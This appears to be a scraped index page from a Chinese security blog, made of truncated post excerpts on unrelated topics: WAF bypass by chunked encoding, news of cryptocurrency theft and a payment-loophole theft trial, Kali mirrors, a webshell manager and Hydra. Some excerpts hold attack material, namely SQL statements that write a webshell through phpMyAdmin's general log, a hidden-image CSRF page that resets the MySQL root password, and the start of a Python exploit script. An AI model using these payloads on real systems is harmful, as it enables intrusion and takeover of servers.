技巧1 使用注释扰乱分块数据包
一些如Imperva、360等比较好的WAF已经对Transfer-Encoding的分块传输做了处理，可以把分块组合成完整的HTTP数据包，这时直接使用常规的分块传输方法尝试绕过的话，会被WAF直接识别并阻断。

我们可以在[RFC7230]中查看到有关分块传输的定义规范。

4.1.  Chunked Transfer Coding

   The chunked transfer coding wraps the payload body in order to
   transfer it as a series of chunks, eac[......]

继续阅读

利用脚本python：

#!/usr/bin/env python
'''/*
* author = Mochazz
* team = 红日安全团队
* env = pyton3
*
*/
'''
import requests
import itertools
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://192.168.1.9/tags.php"
data = {
"_FILES[mochazz][tmp_name[......]

继续阅读

央广网西安8月19日消息(记者温超陕西台记者拓紫云)据中国之声《新闻纵横》报道，近年来，比特币等虚拟货币以极其快速的资产价格涨幅，成为全球市场关注的焦点，而其安全问题也备受关注。据国外媒体报道称，仅在2018年上半年，“黑客”就窃取了价值7.31亿美元，约合人民币48亿元的加密货币。而在国内，西安警方日前成功破获一起网络“黑客”盗窃虚拟货币案件，涉案金额高达6亿元人民币。破获这起案件历时半年多，破案的经过如何？虚拟货币到底哪里不安全？持有虚拟货币又该注意哪些安全问题？

今年3月30日，西安市公安局经开分局接到一名张姓男子报警称，他的个人电脑疑似被非法入侵，大量虚拟货币一夜之间被洗劫一空，[......]

继续阅读

一、更新

#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-[......]

继续阅读

三个sql语句拿下phpmyadmin的shell

首先要知道路径

一句一句的执行

---------------------------------------------------------
set global general_log='on';
---------------------------------------------------------
SET global general_log_file='D:/webshell/www/cmd.php';
---------------------------------------------[......]

继续阅读

修改root密码：

保存为：webshell.html

<p>Hello World</p>
<img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" />

密码为：www.webshell.cc

写文件

首先你要知道路径

保存为：webshell.html
[......]

继续阅读

以Windows 2003为例，启动Windows 2003组策略

点“开始”，在“运行”中敲入gpedit.msc依次展开“用户配置”→“管理模板”→“系统”子键，此时可以看到一个“不要运行指定的Windows应用程序”选项，双击该选项，在“策略”选项卡中选择“启用”选项，启动Windows 2003禁止运行指定应用程序的功能，单击“不允许的应用程序的列表”中的“显示”按钮，打开列表框，在列表框中单击“添加”，打开“添加项目”窗口，然后在该窗口中输入需要禁止运行的程序名（可以不输入路径），比方说要禁用注册表编辑器，则输入 sethc.exe ，接着点击“确定”，即可禁止该应用程序的运行[......]

继续阅读

Burp已经成了绿帽子门必不可少的工具，相信大家都装有Java环境，本软件支持1.7+以及所有安装了环境的系统。1.6后续会考虑兼容。 一直都有想写一款真正实用的跨平台类似的菜刀，然后可惜代码是个渣渣一直可望而不可即，后续随着公司业务增多，大多数目标都有WAF，于是就想写一款完全脱离工具，只依靠配置文件的菜刀。顺便当个码农~~~ 前前后后大约花了一个月，除了打飞机的时间基本就在写这货了，这里要感谢@MelodyZX  牛，在我完成大体框架后，帮了我不少大忙，包括完成虚拟终端，非常感谢。 程序采用java语言编写，数据库采用了sqlite，本来想使用access，但是在jdk1.8以后移除了该功[......]

继续阅读

21岁的男子胡某在购买优酷会员礼包时发现，在自己账户余额不足时，支付宝平台会向其账户退款。于是从2015年9月起，胡某利用自己偶然发现的这一系统漏洞，半年里窃取优酷网所属的合一信息技术(北京)有限公司(下称合一公司)10余万笔资金，共计1300余万元。

如此巨款，胡某除了自己消费挥霍外，还拿出其中的400多万打赏了网络直播网站的女主播，其中最多的一次，“赏”了女主播5万元。今天上午，市一中院开庭审理了胡某涉嫌盗窃罪一案，胡某承认了检方的指控。

意外发现系统漏洞

今天上午，黑框眼镜、身材矮小的胡某被法警带入法庭。“我在公安机关的供述都属实，检察机关对我的指控也都属实。”胡某的回[......]

继续阅读

Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

Hydra was tested to compile on Linux, Windows/Cy[......]

继续阅读